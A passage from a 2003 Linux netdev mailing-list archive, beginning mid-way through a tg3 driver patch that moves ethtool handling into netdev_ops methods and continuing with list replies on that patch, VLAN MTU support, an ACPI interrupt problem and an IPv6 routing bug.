sizeof(wol))) - return -EFAULT; - if (wol.wolopts & ~WAKE_MAGIC) - return -EINVAL; - if ((wol.wolopts & WAKE_MAGIC) && - tp->phy_id == PHY_ID_SERDES && - !(tp->tg3_flags & TG3_FLAG_SERDES_WOL_CAP)) - return -EINVAL; +static void tg3_get_wol(struct net_device *dev, struct ethtool_wolinfo *wol) +{ + struct tg3 *tp = dev->priv; - spin_lock_irq(&tp->lock); - if (wol.wolopts & WAKE_MAGIC) - tp->tg3_flags |= TG3_FLAG_WOL_ENABLE; - else - tp->tg3_flags &= ~TG3_FLAG_WOL_ENABLE; - spin_unlock_irq(&tp->lock); + wol->supported = WAKE_MAGIC; + wol->wolopts = 0; + if (tp->tg3_flags & TG3_FLAG_WOL_ENABLE) + wol->wolopts = WAKE_MAGIC; + memset(&wol->sopass, 0, sizeof(wol->sopass)); +} - return 0; - } - case ETHTOOL_GMSGLVL: { - struct ethtool_value edata = { ETHTOOL_GMSGLVL }; - edata.data = tp->msg_enable; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_SMSGLVL: { - struct ethtool_value edata; - if (copy_from_user(&edata, useraddr, sizeof(edata))) -
return -EFAULT; - tp->msg_enable = edata.data; - return 0; - } - case ETHTOOL_NWAY_RST: { - u32 bmcr; - int r; +static int tg3_set_wol(struct net_device *dev, struct ethtool_wolinfo *wol) +{ + struct tg3 *tp = dev->priv; - spin_lock_irq(&tp->lock); - tg3_readphy(tp, MII_BMCR, &bmcr); - tg3_readphy(tp, MII_BMCR, &bmcr); - r = -EINVAL; - if (bmcr & BMCR_ANENABLE) { - tg3_writephy(tp, MII_BMCR, - bmcr | BMCR_ANRESTART); - r = 0; - } - spin_unlock_irq(&tp->lock); + if (wol->wolopts & ~WAKE_MAGIC) + return -EINVAL; + if ((wol->wolopts & WAKE_MAGIC) && + tp->phy_id == PHY_ID_SERDES && + !(tp->tg3_flags & TG3_FLAG_SERDES_WOL_CAP)) + return -EINVAL; - return r; - } - case ETHTOOL_GLINK: { - struct ethtool_value edata = { ETHTOOL_GLINK }; - edata.data = netif_carrier_ok(tp->dev) ? 1 : 0; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_GRINGPARAM: { - struct ethtool_ringparam ering = { ETHTOOL_GRINGPARAM }; + spin_lock_irq(&tp->lock); + if (wol->wolopts & WAKE_MAGIC) + tp->tg3_flags |= TG3_FLAG_WOL_ENABLE; + else + tp->tg3_flags &= ~TG3_FLAG_WOL_ENABLE; + spin_unlock_irq(&tp->lock); - ering.rx_max_pending = TG3_RX_RING_SIZE - 1; - ering.rx_mini_max_pending = 0; - ering.rx_jumbo_max_pending = TG3_RX_JUMBO_RING_SIZE - 1; - - ering.rx_pending = tp->rx_pending; - ering.rx_mini_pending = 0; - ering.rx_jumbo_pending = tp->rx_jumbo_pending; - ering.tx_pending = tp->tx_pending; + return 0; +} - if (copy_to_user(useraddr, &ering, sizeof(ering))) - return -EFAULT; - return 0; - } - case ETHTOOL_SRINGPARAM: { - struct ethtool_ringparam ering; +static u32 tg3_get_msglevel(struct net_device *dev) +{ + struct tg3 *tp = dev->priv; + return tp->msg_enable; +} - if (copy_from_user(&ering, useraddr, sizeof(ering))) - return -EFAULT; +static void tg3_set_msglevel(struct net_device *dev, u32 value) +{ + struct tg3 *tp = dev->priv; + tp->msg_enable = value; +} - if ((ering.rx_pending > TG3_RX_RING_SIZE - 1) || - (ering.rx_jumbo_pending > 
TG3_RX_JUMBO_RING_SIZE - 1) || - (ering.tx_pending > TG3_TX_RING_SIZE - 1)) - return -EINVAL; +static int tg3_nway_reset(struct net_device *dev) +{ + struct tg3 *tp = dev->priv; + u32 bmcr; + int r; - tg3_netif_stop(tp); - spin_lock_irq(&tp->lock); - spin_lock(&tp->tx_lock); + spin_lock_irq(&tp->lock); + tg3_readphy(tp, MII_BMCR, &bmcr); + tg3_readphy(tp, MII_BMCR, &bmcr); + r = -EINVAL; + if (bmcr & BMCR_ANENABLE) { + tg3_writephy(tp, MII_BMCR, bmcr | BMCR_ANRESTART); + r = 0; + } + spin_unlock_irq(&tp->lock); - tp->rx_pending = ering.rx_pending; - tp->rx_jumbo_pending = ering.rx_jumbo_pending; - tp->tx_pending = ering.tx_pending; - - tg3_halt(tp); - tg3_init_rings(tp); - tg3_init_hw(tp); - netif_wake_queue(tp->dev); - spin_unlock(&tp->tx_lock); - spin_unlock_irq(&tp->lock); - tg3_netif_start(tp); + return r; +} - return 0; - } - case ETHTOOL_GPAUSEPARAM: { - struct ethtool_pauseparam epause = { ETHTOOL_GPAUSEPARAM }; +static void tg3_get_ringparam(struct net_device *dev, struct ethtool_ringparam *ering) +{ + struct tg3 *tp = dev->priv; - epause.autoneg = - (tp->tg3_flags & TG3_FLAG_PAUSE_AUTONEG) != 0; - epause.rx_pause = - (tp->tg3_flags & TG3_FLAG_PAUSE_RX) != 0; - epause.tx_pause = - (tp->tg3_flags & TG3_FLAG_PAUSE_TX) != 0; - if (copy_to_user(useraddr, &epause, sizeof(epause))) - return -EFAULT; - return 0; - } - case ETHTOOL_SPAUSEPARAM: { - struct ethtool_pauseparam epause; + ering->rx_max_pending = TG3_RX_RING_SIZE - 1; + ering->rx_mini_max_pending = 0; + ering->rx_jumbo_max_pending = TG3_RX_JUMBO_RING_SIZE - 1; + + ering->rx_pending = tp->rx_pending; + ering->rx_mini_pending = 0; + ering->rx_jumbo_pending = tp->rx_jumbo_pending; + ering->tx_pending = tp->tx_pending; +} - if (copy_from_user(&epause, useraddr, sizeof(epause))) - return -EFAULT; +static int tg3_set_ringparam(struct net_device *dev, struct ethtool_ringparam *ering) +{ + struct tg3 *tp = dev->priv; - tg3_netif_stop(tp); - spin_lock_irq(&tp->lock); - spin_lock(&tp->tx_lock); - if 
(epause.autoneg) - tp->tg3_flags |= TG3_FLAG_PAUSE_AUTONEG; - else - tp->tg3_flags &= ~TG3_FLAG_PAUSE_AUTONEG; - if (epause.rx_pause) - tp->tg3_flags |= TG3_FLAG_PAUSE_RX; - else - tp->tg3_flags &= ~TG3_FLAG_PAUSE_RX; - if (epause.tx_pause) - tp->tg3_flags |= TG3_FLAG_PAUSE_TX; - else - tp->tg3_flags &= ~TG3_FLAG_PAUSE_TX; - tg3_halt(tp); - tg3_init_rings(tp); - tg3_init_hw(tp); - spin_unlock(&tp->tx_lock); - spin_unlock_irq(&tp->lock); - tg3_netif_start(tp); + if ((ering->rx_pending > TG3_RX_RING_SIZE - 1) || + (ering->rx_jumbo_pending > TG3_RX_JUMBO_RING_SIZE - 1) || + (ering->tx_pending > TG3_TX_RING_SIZE - 1)) + return -EINVAL; - return 0; - } - case ETHTOOL_GRXCSUM: { - struct ethtool_value edata = { ETHTOOL_GRXCSUM }; + tg3_netif_stop(tp); + spin_lock_irq(&tp->lock); + spin_lock(&tp->tx_lock); - edata.data = - (tp->tg3_flags & TG3_FLAG_RX_CHECKSUMS) != 0; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_SRXCSUM: { - struct ethtool_value edata; + tp->rx_pending = ering->rx_pending; + tp->rx_jumbo_pending = ering->rx_jumbo_pending; + tp->tx_pending = ering->tx_pending; + + tg3_halt(tp); + tg3_init_rings(tp); + tg3_init_hw(tp); + netif_wake_queue(tp->dev); + spin_unlock(&tp->tx_lock); + spin_unlock_irq(&tp->lock); + tg3_netif_start(tp); - if (copy_from_user(&edata, useraddr, sizeof(edata))) - return -EFAULT; + return 0; +} - if (tp->tg3_flags & TG3_FLAG_BROKEN_CHECKSUMS) { - if (edata.data != 0) - return -EINVAL; - return 0; - } +static void tg3_get_pauseparam(struct net_device *dev, struct ethtool_pauseparam *epause) +{ + struct tg3 *tp = dev->priv; - spin_lock_irq(&tp->lock); - if (edata.data) - tp->tg3_flags |= TG3_FLAG_RX_CHECKSUMS; - else - tp->tg3_flags &= ~TG3_FLAG_RX_CHECKSUMS; - spin_unlock_irq(&tp->lock); + epause->autoneg = (tp->tg3_flags & TG3_FLAG_PAUSE_AUTONEG) != 0; + epause->rx_pause = (tp->tg3_flags & TG3_FLAG_PAUSE_RX) != 0; + epause->tx_pause = (tp->tg3_flags & TG3_FLAG_PAUSE_TX) != 0; +} - 
return 0; - } - case ETHTOOL_GTXCSUM: { - struct ethtool_value edata = { ETHTOOL_GTXCSUM }; +static int tg3_set_pauseparam(struct net_device *dev, struct ethtool_pauseparam *epause) +{ + struct tg3 *tp = dev->priv; - edata.data = - (tp->dev->features & NETIF_F_IP_CSUM) != 0; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_STXCSUM: { - struct ethtool_value edata; + tg3_netif_stop(tp); + spin_lock_irq(&tp->lock); + spin_lock(&tp->tx_lock); + if (epause->autoneg) + tp->tg3_flags |= TG3_FLAG_PAUSE_AUTONEG; + else + tp->tg3_flags &= ~TG3_FLAG_PAUSE_AUTONEG; + if (epause->rx_pause) + tp->tg3_flags |= TG3_FLAG_PAUSE_RX; + else + tp->tg3_flags &= ~TG3_FLAG_PAUSE_RX; + if (epause->tx_pause) + tp->tg3_flags |= TG3_FLAG_PAUSE_TX; + else + tp->tg3_flags &= ~TG3_FLAG_PAUSE_TX; + tg3_halt(tp); + tg3_init_rings(tp); + tg3_init_hw(tp); + spin_unlock(&tp->tx_lock); + spin_unlock_irq(&tp->lock); + tg3_netif_start(tp); - if (copy_from_user(&edata, useraddr, sizeof(edata))) - return -EFAULT; + return 0; +} - if (tp->tg3_flags & TG3_FLAG_BROKEN_CHECKSUMS) { - if (edata.data != 0) - return -EINVAL; - return 0; - } +static u32 tg3_get_rx_csum(struct net_device *dev) +{ + struct tg3 *tp = dev->priv; + return (tp->tg3_flags & TG3_FLAG_RX_CHECKSUMS) != 0; +} - if (edata.data) - tp->dev->features |= NETIF_F_IP_CSUM; - else - tp->dev->features &= ~NETIF_F_IP_CSUM; +static int tg3_set_rx_csum(struct net_device *dev, u32 data) +{ + struct tg3 *tp = dev->priv; + if (tp->tg3_flags & TG3_FLAG_BROKEN_CHECKSUMS) { + if (data != 0) + return -EINVAL; return 0; } - case ETHTOOL_GSG: { - struct ethtool_value edata = { ETHTOOL_GSG }; - edata.data = - (tp->dev->features & NETIF_F_SG) != 0; - if (copy_to_user(useraddr, &edata, sizeof(edata))) - return -EFAULT; - return 0; - } - case ETHTOOL_SSG: { - struct ethtool_value edata; + spin_lock_irq(&tp->lock); + if (data) + tp->tg3_flags |= TG3_FLAG_RX_CHECKSUMS; + else + tp->tg3_flags &= 
~TG3_FLAG_RX_CHECKSUMS; + spin_unlock_irq(&tp->lock); - if (copy_from_user(&edata, useraddr, sizeof(edata))) - return -EFAULT; + return 0; +} - if (edata.data) - tp->dev->features |= NETIF_F_SG; - else - tp->dev->features &= ~NETIF_F_SG; +static int tg3_set_tx_csum(struct net_device *dev, u32 data) +{ + struct tg3 *tp = dev->priv; + if (tp->tg3_flags & TG3_FLAG_BROKEN_CHECKSUMS) { + if (data != 0) + return -EINVAL; return 0; } - }; - return -EOPNOTSUPP; + if (data) + dev->features |= NETIF_F_IP_CSUM; + else + dev->features &= ~NETIF_F_IP_CSUM; + + return 0; } +static struct netdev_ops tg3_netdev_ops = { + .get_settings = tg3_get_settings, + .set_settings = tg3_set_settings, + .get_drvinfo = tg3_get_drvinfo, + .get_regs_len = tg3_get_regs_len, + .get_regs = tg3_get_regs, + .get_wol = tg3_get_wol, + .set_wol = tg3_set_wol, + .get_msglevel = tg3_get_msglevel, + .set_msglevel = tg3_set_msglevel, + .nway_reset = tg3_nway_reset, + .get_link = netdev_op_get_link, + .get_ringparam = tg3_get_ringparam, + .set_ringparam = tg3_set_ringparam, + .get_pauseparam = tg3_get_pauseparam, + .set_pauseparam = tg3_set_pauseparam, + .get_rx_csum = tg3_get_rx_csum, + .set_rx_csum = tg3_set_rx_csum, + .get_tx_csum = netdev_op_get_tx_csum, + .set_tx_csum = tg3_set_tx_csum, + .get_sg = netdev_op_get_sg, + .set_sg = netdev_op_set_sg, +}; + static int tg3_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd) { struct mii_ioctl_data *data = (struct mii_ioctl_data *)&ifr->ifr_data; @@ -5490,8 +5391,6 @@ static int tg3_ioctl(struct net_device * int err; switch(cmd) { - case SIOCETHTOOL: - return tg3_ethtool_ioctl(dev, (void *) ifr->ifr_data); case SIOCGMIIPHY: data->phy_id = PHY_ADDR; @@ -6773,6 +6672,7 @@ static int __devinit tg3_init_one(struct tp->rx_jumbo_pending = TG3_DEF_RX_JUMBO_RING_PENDING; tp->tx_pending = TG3_DEF_TX_RING_PENDING; + dev->netdev_ops = &tg3_netdev_ops; dev->open = tg3_open; dev->stop = tg3_close; dev->get_stats = tg3_get_stats; -- "It's not Hollywood. 
War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From greearb@candelatech.com Wed Jul 9 10:11:43 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 10:11:49 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69HBM2x028953 for ; Wed, 9 Jul 2003 10:11:43 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h69HB5Kk007597; Wed, 9 Jul 2003 10:11:05 -0700 Message-ID: <3F0C4CA8.7090502@candelatech.com> Date: Wed, 09 Jul 2003 10:11:04 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Matthew Wilcox CC: netdev@oss.sgi.com, "David S. Miller" , Arnaldo Carvalho de Melo , Jeff Garzik Subject: Re: [PATCH] netdev_ops References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> In-Reply-To: <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3861 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Matthew Wilcox wrote: > Changes since yesterday's patch: > > - Make all methods take the struct net_device as suggested by Ben Greear. > - Rename self_test_len() and get_stats_len() to *_count() to reflect > that they return a count of elements, not a byte length. 
> - Related bugfixes. > - Remove the get_strings_len() method; we now infer the length from > either self_test_count() or get_stats_count(). > - memset() the drvinfo struct so it doesn't leak information from the > kernel stack (existing bug in tg3). > - Clamp regs.len in ethtool.c rather than in the driver. > - Pass the stringset value to get_strings() rather than a pointer to > the whole ethtool_gstrings struct. > > I have a question about the error return values in ethtool_get_strings(). > Are -EOPNOTSUPP and -EINVAL the right ones to use in the case statement? > Or should I perhaps be using -ENOSYS instead of EINVAL? I've noticed > drepper tends to prefer this for unimplemented subops. Since this is > an ioctl(), perhaps I should be using -ENOTTY instead ;-) Considering any number of things may change in the future, what do you think of adding a global 'nettool-version' method. That could allow user-space code to take appropriate action if something ever changes in a non-compatible way.... Also, for the strings (labels) passed back to user space, is there any documentation for suggested values for these strings? Even though we can't be completely type-safe, if there were suggested values in a comment in the code, it could help a great deal for any code trying to parse them for multiple different drivers/nics. 
Ben -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From greearb@candelatech.com Wed Jul 9 10:13:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 10:13:36 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69HDU2x029220 for ; Wed, 9 Jul 2003 10:13:31 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h69HDBKk007852; Wed, 9 Jul 2003 10:13:11 -0700 Message-ID: <3F0C4D27.20907@candelatech.com> Date: Wed, 09 Jul 2003 10:13:11 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: "Hen, Shmulik" CC: Andrius Kasparavicius , netdev@oss.sgi.com Subject: Re: network interface cards native vlans support in linux kernel? References: In-Reply-To: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3862 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Hen, Shmulik wrote: > Do you mean "native" as in hardware acceleration offloading? > If that's the case then the 8021q vlan module handshakes with the device driver to check for support and that's it. No need to do any settings on the device. In case there is no offloading support, the vlan module will take care of all stripping/inserting of the vlan tag into place. > On the other hand, if the device cannot handle 1504 byte packets, it defines itself as "vlan challenged" and you can't use vlan on it at all. Even challenged ones can work if you set your MTU (and all peer MTUs) to 4 less than normal, i.e. 1496.
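For anyone wondering where the 1504 and 1496 figures come from, here is a rough userspace sketch of the arithmetic. It is an illustration only, not kernel code: the constant and function names are made up for this example, and it assumes a normal 1500-byte Ethernet MTU and a single 4-byte 802.1Q tag.

```c
#include <assert.h>

/* Hypothetical names for illustration; not taken from the kernel sources. */
#define EXAMPLE_ETH_MTU      1500  /* assumed "normal" Ethernet MTU */
#define EXAMPLE_VLAN_TAG_LEN 4     /* one 802.1Q tag */

/* Size the NIC must accept to carry a full-MTU payload plus one VLAN tag. */
static int example_vlan_required_size(int mtu)
{
	return mtu + EXAMPLE_VLAN_TAG_LEN;
}

/* MTU to configure (on this host and its peers) when the NIC cannot
 * accept the extra tag bytes. */
static int example_vlan_reduced_mtu(int mtu)
{
	return mtu - EXAMPLE_VLAN_TAG_LEN;
}

/* Checks the two figures quoted in this thread. */
static void example_vlan_self_check(void)
{
	assert(example_vlan_required_size(EXAMPLE_ETH_MTU) == 1504);
	assert(example_vlan_reduced_mtu(EXAMPLE_ETH_MTU) == 1496);
}
```

Lowering the MTU only helps if every peer on the VLAN does the same, since a peer still sending full 1500-byte payloads would produce tagged frames the challenged NIC cannot receive.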
Ben > > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From greearb@candelatech.com Wed Jul 9 10:15:50 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 10:15:53 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69HFn2x029606 for ; Wed, 9 Jul 2003 10:15:50 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h69HFfKk008170; Wed, 9 Jul 2003 10:15:41 -0700 Message-ID: <3F0C4DBD.8020007@candelatech.com> Date: Wed, 09 Jul 2003 10:15:41 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Andrius Kasparavicius CC: netdev@oss.sgi.com Subject: Re: network interface cards native vlans support in linux kernel? References: In-Reply-To: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3863 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Andrius Kasparavicius wrote: > hello, as far as i know, currently there is no native vlan support in > network device drivers. I mean, always need patching MTU.. add 4 bytes.. > :-( > > is there any problems to include full vlans support? Intel's e100 driver (and all NICs supported by it) support vlans fine, as do most of the GigE NICs. Tulip does not, last I heard, though a work-around patch has been around forever. Realtek worked at one time, not sure about now though...
Ben > > > Andrius > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From willy@www.linux.org.uk Wed Jul 9 10:25:31 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 10:25:38 -0700 (PDT) Received: from www.linux.org.uk (IDENT:IGTH7NcxQdNtrnY8ih8VlTNxdqHouBop@parcelfarce.linux.theplanet.co.uk [195.92.249.252]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69HPT2x001623 for ; Wed, 9 Jul 2003 10:25:30 -0700 Received: from willy by www.linux.org.uk with local (Exim 4.14) id 19aIh3-0006Yh-J5; Wed, 09 Jul 2003 18:25:25 +0100 Date: Wed, 9 Jul 2003 18:25:25 +0100 From: Matthew Wilcox To: Ben Greear Cc: Matthew Wilcox , netdev@oss.sgi.com, "David S. Miller" , Arnaldo Carvalho de Melo , Jeff Garzik Subject: Re: [PATCH] netdev_ops Message-ID: <20030709172525.GZ1939@parcelfarce.linux.theplanet.co.uk> References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> <3F0C4CA8.7090502@candelatech.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <3F0C4CA8.7090502@candelatech.com> User-Agent: Mutt/1.4.1i X-archive-position: 3864 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: willy@debian.org Precedence: bulk X-list: netdev On Wed, Jul 09, 2003 at 10:11:04AM -0700, Ben Greear wrote: > Considering any number of things may change in the future, what do > you think of adding a global 'nettool-version' method. That could > allow user-space code to take appropriate action if something ever > changes in a non-compatible way.... This patch makes only user-invisible changes. 
I'm trying to establish a base for further cleanups (eg, acme wants to look at unifying the wireless ops and the existing net_device function pointers into netdev_ops). I don't really have a position on adding a nettool-version ioctl or whatever, but I'm not sure it would make sense to have that as a netdev method. > Also, for the strings (labels) passed back to user space, is there any > documentation for suggested values for these strings? Even though we > can't be completely type-safe, if there were suggested values in > a comment in the code, it could help a great deal for any code trying to > parse them for multiple different drivers/nics. I didn't see any documentation; I just read the code. The only drivers I noticed supporting the GSTRINGS subcommand are 8139cp, 8139too, e100 and e1000. -- "It's not Hollywood. War is real, war is primarily not about defeat or victory, it is about death. I've seen thousands and thousands of dead bodies. Do you think I want to have an academic debate on this subject?" -- Robert Fisk From kpfleming@cox.net Wed Jul 9 10:34:29 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 10:34:37 -0700 (PDT) Received: from fed1mtao07.cox.net (fed1mtao07.cox.net [68.6.19.124]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69HY92x002025 for ; Wed, 9 Jul 2003 10:34:29 -0700 Received: from jeeves.kpf.internal ([24.56.60.83]) by fed1mtao07.cox.net (InterMail vM.5.01.04.05 201-253-122-122-105-20011231) with ESMTP id <20030709173402.IZZS29962.fed1mtao07.cox.net@jeeves.kpf.internal>; Wed, 9 Jul 2003 13:34:02 -0400 Received: from [192.168.172.107] (helo=cox.net) by jeeves.kpf.internal with esmtp (Exim 4.05) id 19aIpP-0001UK-00; Wed, 09 Jul 2003 10:34:03 -0700 Message-ID: <3F0C520E.2080809@cox.net> Date: Wed, 09 Jul 2003 10:34:06 -0700 From: "Kevin P. 
Fleming" User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 X-Accept-Language: en-us, en MIME-Version: 1.0 To: acpi-support@lists.sourceforge.net, netdev@oss.sgi.com Subject: How to begin debugging ACPI/network driver interrupt problem? Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3865 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: kpfleming@cox.net Precedence: bulk X-list: netdev I've got a system here using an MSI KT266-based motherboard that's been running 2.5.X successfully for months now. However, 2.5.73/74 have introduced a problem that (so far) I have only been able to cure by either not compiling in ACPI or using acpi=off on the kernel command line. The system has three NICs: eth0 is a National Semiconductor DP83815, eth1 is a National Semiconductor DP83820, and eth2 is a Lite-On 82C168. All three NICs work fine. However, on the newer kernels, with ACPI compiled in, during initialization of eth0 the kernel generates "IRQ 17 and nobody cared!" messages and disables IRQ 17, which causes eth0 to be useless :-) With older kernels, or ACPI not turned on, eth0 still gets assigned IRQ 17, and works just fine. IRQ 17 is not shared with any other devices. I don't think I can handle the additional message traffic of these two mailing lists, so I haven't subscribed... If anyone can suggest a course of action for how to debug this problem, please cc me on any responses.
From greearb@candelatech.com Wed Jul 9 11:30:39 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 11:31:05 -0700 (PDT) Received: from grok.yi.org (evrtwa1-ar2-4-33-045-074.evrtwa1.dsl-verizon.net [4.33.45.74]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69ITr2x003913 for ; Wed, 9 Jul 2003 11:30:38 -0700 Received: from candelatech.com (localhost.localdomain [127.0.0.1]) by grok.yi.org (8.12.8/8.12.8) with ESMTP id h69IOZKk016833; Wed, 9 Jul 2003 11:24:35 -0700 Message-ID: <3F0C5DE3.7000506@candelatech.com> Date: Wed, 09 Jul 2003 11:24:35 -0700 From: Ben Greear Organization: Candela Technologies User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.4) Gecko/20030529 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Jeff Garzik CC: Matthew Wilcox , netdev@oss.sgi.com, "David S. Miller" , Arnaldo Carvalho de Melo Subject: Re: [PATCH] netdev_ops References: <20030708163042.GL23597@parcelfarce.linux.theplanet.co.uk> <3F0B2D30.4020102@candelatech.com> <20030708212551.GL1939@parcelfarce.linux.theplanet.co.uk> <20030708.150835.78728697.davem@redhat.com> <20030709161520.GW1939@parcelfarce.linux.theplanet.co.uk> <3F0C4CA8.7090502@candelatech.com> <20030709181459.GE15293@gtf.org> In-Reply-To: <20030709181459.GE15293@gtf.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit X-archive-position: 3866 X-ecartis-version: Ecartis v1.0.0 Sender: netdev-bounce@oss.sgi.com Errors-to: netdev-bounce@oss.sgi.com X-original-sender: greearb@candelatech.com Precedence: bulk X-list: netdev Jeff Garzik wrote: > On Wed, Jul 09, 2003 at 10:11:04AM -0700, Ben Greear wrote: > >>Also, for the strings (labels) passed back to user space, is there any >>documentation for suggested values for these strings? Even though we >>can't be completely type-safe, if there were suggested values in >>a comment in the code, it could help a great deal for any code trying to >>parse them for multiple different drivers/nics. 
> > > The strings represent NIC-specific attributes. Yes, but surely there is some commonality? I'm not asking for something set in stone, but just some general guidelines. However, I don't feel too strongly about this, so if it is not worth the time/effort, then I'll still be happy :) Ben > > Jeff > > -- Ben Greear President of Candela Technologies Inc http://www.candelatech.com ScryMUD: http://scry.wanfear.com http://scry.wanfear.com/~greear From yoshfuji@linux-ipv6.org Wed Jul 9 11:30:41 2003 Received: with ECARTIS (v1.0.0; list netdev); Wed, 09 Jul 2003 11:31:07 -0700 (PDT) Received: from yue.hongo.wide.ad.jp (yue.hongo.wide.ad.jp [203.178.139.94]) by oss.sgi.com (8.12.9/8.12.9) with SMTP id h69IU12x003915 for ; Wed, 9 Jul 2003 11:30:39 -0700 Received: from localhost (localhost [127.0.0.1]) by yue.hongo.wide.ad.jp (8.12.3+3.5Wbeta/8.12.3/Debian-5) with ESMTP id h69IVHBo025676; Thu, 10 Jul 2003 03:31:17 +0900 Date: Thu, 10 Jul 2003 03:31:17 +0900 (JST) Message-Id: <20030710.033117.93244305.yoshfuji@linux-ipv6.org> To: Jean-Luc.Richier@imag.fr Cc: pekkas@netcore.fi, linux-kernel@vger.kernel.org, netdev@oss.sgi.com, yoshfuji@linux-ipv6.org Subject: Re: Bug in Linux 2.5.74 IPv6 routing From: YOSHIFUJI Hideaki / =?iso-2022-jp?B?GyRCNUhGIzFRTEAbKEI=?= In-Reply-To: <20030709195237.A8550@horus.imag.fr> References: <20030709195237.A8550@horus.imag.fr> Organization: USAGI Project X-URL: http://www.yoshifuji.org/%7Ehideaki/ X-Fingerprint: 90 22 65 EB 1E CF 3A D1 0B DF 80 D8 48 07 F8 94 E0 62 0E EA X-PGP-Key-URL: http://www.yoshifuji.org/%7Ehideaki/hideaki@yoshifuji.org.asc X-Face: "5$Al-.M>NJ%a'@hhZdQm:."qn~PA^gq4o*>iCFToq*bAi#4FRtx}enhuQKz7fNqQz\BYU] $~O_5m-9'}MIs`XGwIEscw;e5b>n"B_?j/AkL~i/MEaZBLP X-Mailer: Mew version 2.2 on Emacs 20.7 / Mule 4.1 (AOI) Mime-Version: 1.0 Content-Type: Text/Plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-archive-position: 3867 X-ecartis-version: Ecartis v1.0.0 Sender: 